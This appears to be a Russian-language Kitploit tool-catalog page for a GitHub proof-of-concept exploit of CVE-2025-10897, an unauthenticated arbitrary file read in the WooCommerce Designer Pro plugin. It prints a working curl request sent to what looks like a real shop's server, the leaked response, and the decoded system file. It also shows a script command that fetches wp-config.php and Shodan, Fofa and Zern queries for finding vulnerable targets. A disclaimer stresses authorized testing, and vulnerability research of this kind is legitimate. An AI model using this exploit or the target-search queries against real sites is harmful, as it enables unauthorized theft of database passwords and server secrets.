Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-10897 — WooCommerce Designer Pro <= 1.9.28 - Неаутентифицированное произвольное чтение файлов | Kitploit
Инструменты/GitHubGitHub/error-inside/cve-2025-10897
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийЭксфильтрация данныхСбор информацииВеб-безопасностьТестирование на Проникновение
GitHuberror-inside/cve-2025-10897

CVE-2025-10897

WooCommerce Designer Pro <= 1.9.28 - Неаутентифицированное произвольное чтение файлов

Репозиторий
18 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-10897

Python CVSS License Educational

WooCommerce — это плагин электронной коммерции с открытым исходным кодом для WordPress, который превращает веб-сайты в интернет-магазины. WooCommerce Designer Pro — это плагин WordPress, разработанный JMA Plugins, который позволяет покупателям проектировать и настраивать товары непосредственно в магазинах WooCommerce.

ВАЖНО: WooCommerce и WooCommerce Designer Pro — это совершенно разные вещи.

WooCommerce Designer Pro поддерживает создание визитных карточек, открыток, флаеров, плакатов, футболок, наклеек и других печатных материалов с такими функциями, как поддержка цвета CMYK, генерация PDF и интерфейс проектирования на основе холста. Плагин интегрируется с WooCommerce, обеспечивая настройку товаров в реальном времени перед покупкой, что делает его подходящим для онлайн-типографий и магазинов с индивидуальной продукцией.

CVE-2025-10897 — это неаутентифицированное произвольное чтение файлов в WooCommerce Designer Pro версиях вплоть до 1.9.28 (CWE-22). Злоумышленник отправляет POST /wp-admin/admin-ajax.php с параметром action=wcdp_convert_resource_cmyk и URL-адресом file://, указывающим на серверные файлы, такие как /etc/passwd или wp-config.php. Плагин возвращает содержимое файла в JSON-ответе. Это может привести к утечке паролей базы данных и других секретов из wp-config.php без какой-либо учётной записи WordPress.

PoC

ЗАПРОС

root@kitploit:~
curl -sk -X POST 'https://www.procolorprints.ca/wp-admin/admin-ajax.php' \
  -H 'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -H 'Accept: */*' \
  -H 'Connection: close' \
  -d 'action=wcdp_convert_resource_cmyk&url=file:///etc/os-release'

ОТВЕТ

root@kitploit:~
{"string":"data:image\/jpg;base64,TkFNRT0iQWxtYUxpbnV4IgpWRVJTSU9OPSI5LjggKE9saXZlIEphZ3VhcikiCklEPSJhbG1hbGludXgiCklEX0xJS0U9InJoZWwgY2VudG9zIGZlZG9yYSIKVkVSU0lPTl9JRD0iOS44IgpQTEFURk9STV9JRD0icGxhdGZvcm06ZWw5IgpQUkVUVFlfTkFNRT0iQWxtYUxpbnV4IDkuOCAoT2xpdmUgSmFndWFyKSIKQU5TSV9DT0xPUj0iMDszNCIKTE9HTz0iZmVkb3JhLWxvZ28taWNvbiIKQ1BFX05BTUU9ImNwZTovbzphbG1hbGludXg6YWxtYWxpbnV4Ojk6OmJhc2VvcyIKSE9NRV9VUkw9Imh0dHBzOi8vYWxtYWxpbnV4Lm9yZy8iCkRPQ1VNRU5UQVRJT05fVVJMPSJodHRwczovL3dpa2kuYWxtYWxpbnV4Lm9yZy8iCkJVR19SRVBPUlRfVVJMPSJodHRwczovL2J1Z3MuYWxtYWxpbnV4Lm9yZy8iCgpBTE1BTElOVVhfTUFOVElTQlRfUFJPSkVDVD0iQWxtYUxpbnV4LTkiCkFMTUFMSU5VWF9NQU5USVNCVF9QUk9KRUNUX1ZFUlNJT049IjkuOCIKUkVESEFUX1NVUFBPUlRfUFJPRFVDVD0iQWxtYUxpbnV4IgpSRURIQVRfU1VQUE9SVA==","success":true}

Декодированный ответ Base64:

root@kitploit:~
NAME="AlmaLinux"
VERSION="9.8 (Olive Jaguar)"
ID="almalinux"
ID_LIKE="rhel centos fedora"
VERSION_ID="9.8"
PLATFORM_ID="platform:el9"
PRETTY_NAME="AlmaLinux 9.8 (Olive Jaguar)"
ANSI_COLOR="0;34"
LOGO="fedora-logo-icon"
CPE_NAME="cpe:/o:almalinux:almalinux:9::baseos"
HOME_URL="https://almalinux.org/"
DOCUMENTATION_URL="https://wiki.almalinux.org/"
BUG_REPORT_URL="https://bugs.almalinux.org/"

ALMALINUX_MANTISBT_PROJECT="AlmaLinux-9"
ALMALINUX_MANTISBT_PROJECT_VERSION="9.8"
REDHAT_SUPPORT_PRODUCT="AlmaLinux"
REDHAT_SUPPORT_PRODUCT_VERSION="9.8"
SUPPORT_END=2032-06-01

Использование

root@kitploit:~
python CVE-2025-10897-X7.py

ПРИМЕЧАНИЕ: Наш PoC-скрипт пытается получить wp-config.php, но на целевом сайте WordPress может быть установлен не в /var/www, а в другом месте.

Аргументы для поиска уязвимых серверов

  • Zern : body:"wc-designer-pro"
  • Fofa : body="wc-designer-pro"
  • Shodan : http.body:"wc-designer-pro"

Ресурсы

  • OpenCVE — WooCommerce Designer Pro <= 1.9.28: неаутентифицированное произвольное чтение файлов
  • NIST — CVE-2025-10897 (подробности)
  • Домашняя страница WooCommerce
  • WooCommerce Designer Pro — официальный сайт разработчика
  • WooCommerce Designer Pro — официальный маркетплейс
  • Nuclei-шаблон — CVE-2025-10897

Отказ от ответственности

Этот репозиторий и его содержимое предоставляются строго для легитимных исследований в области безопасности, авторизованного тестирования на проникновение, учебных целей и защитных мероприятий. Используя или получая доступ к этим материалам, вы подтверждаете полную ответственность за то, что ваши действия соответствуют всем применимым законам, и что вы получили надлежащее разрешение перед тестированием или применением этих методов к любой системе, которая вам не принадлежит.

Авторы и сопровождающие этого проекта не несут ответственности за любой ущерб, юридические последствия или неправомерное использование в результате применения этой информации. Любое использование в целях несанкционированного доступа, вредоносной деятельности или незаконных целей прямо запрещено и не поддерживается.

Используйте ответственно. Оставайтесь в рамках закона. Тестируйте только то, что вам принадлежит или на что у вас есть явное письменное разрешение.

Авторы

  • ErrorInside // SCT

Лицензия

SCT-PL

Скачать инструмент